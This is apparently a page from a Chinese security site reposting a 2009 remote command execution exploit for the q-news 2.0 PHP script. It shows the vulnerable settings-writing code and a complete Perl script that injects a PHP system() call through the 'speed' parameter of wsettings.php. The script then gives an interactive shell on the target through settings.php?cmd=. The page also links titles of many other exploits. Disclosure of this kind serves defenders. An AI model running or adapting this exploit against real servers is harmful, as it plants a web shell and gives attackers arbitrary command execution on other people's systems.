首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 q-news 2.0 Remote Command Execution Exploit 来源：fireshotautisticiorg 作者：FireShot 发布时间：2009-02-11   ########################################################################## Author = FireShot , Jacopo Vuga. Mail = fireshot<at>autistici<dot>org Vulnerability = Remote Command Execution Software = q-news 2.0 Download = http://ovh.dl.sourceforge.net/sourceforge/php-box/2.0_nologin.zip Greets to = Osirys for his friendship and his tips, Myral, str0ke ########################################################################### [CODE] <?php $filename = 'settings.php'; if (is_writable($filename)) {     if (!$handle = fopen($filename, 'w')) {          print "Cannot open file ($filename)";          exit;     } if (!fwrite($handle, "<?php   \$password = '$password';   \$font = '$font';   \$height = '$height';   \$width = '$width';   \$direction = '$direction';   \$speed = '$speed';   \$bgcolor = '$bgcolor';   \$txtcolor = '$txtcolor';   \$txtsize = '$txtsize';   ?>")) {         print "Cannot write to file ($filename)";         exit;     }     print "Successfully saved settings to file ($filename)";     fclose($handle);                     } else {     print "The file $filename is not writable"; } ?> [/CODE] [EXPLOIT] #!/usr/bin/perl use HTTP::Request; use LWP::UserAgent; my $host  =  $ARGV[0]; my $vuln  =  "/wsettings.php?speed="; my $rce   =  "/settings.php?cmd="; my $evil  =  "';system(\$_GET[cmd]);\$x = '"; my $inj_url = $host.$vuln.$evil; my $rce_url = $host.$rce; ($host) || die " usage= perl $0 site \n"; print "------------------------\n"; print "   Q-News RCE Exploit   \n"; print "       by FireShot      \n"; print "------------------------\n\n"; $response = get($inj_url); if ($response =~ /Successfully saved settings/) {     &shell; } else {     print "error \n";     exit(0); } sub shell {     print "FireShot-shell: ";     my $cmd = <STDIN>;     $cmd !~ /quit/ || die " exit \n";     my $url = $rce_url.$cmd;     my $re = get($url);     if ($re =~ /(.)/) {         print $re;     }     else {         print "command unknow \n";     }     &shell; } sub get() {     my $url = $_[0];     my $req = HTTP::Request->new(GET => $url);     my $agent  = LWP::UserAgent->new();     $agent->timeout(4);     my $response = $agent->request($req);     return $response->content; } [/EXPLOIT] ############################################################################   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Fluorine CMS 0.1 rc 1 FD / SQL ·ProFTPd with mod_mysql Authent ·Php168 v2008 权限提升漏洞 ·TYPO3 < 4.0.12/4.1.10/4.2.6 (j ·Hedgedog CMS version 1.21 remo ·Lanius CMS version 0.5.1 cross ·TightVNC Authentication Failur ·Bloggeruniverse v2Beta (editco ·Squid < 3.1 5 HTTP Version Num ·Remote exploit for the authent ·Hedgedog-CMS <= 1.21 Remote Co ·Remote exploit for InselPhoto   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved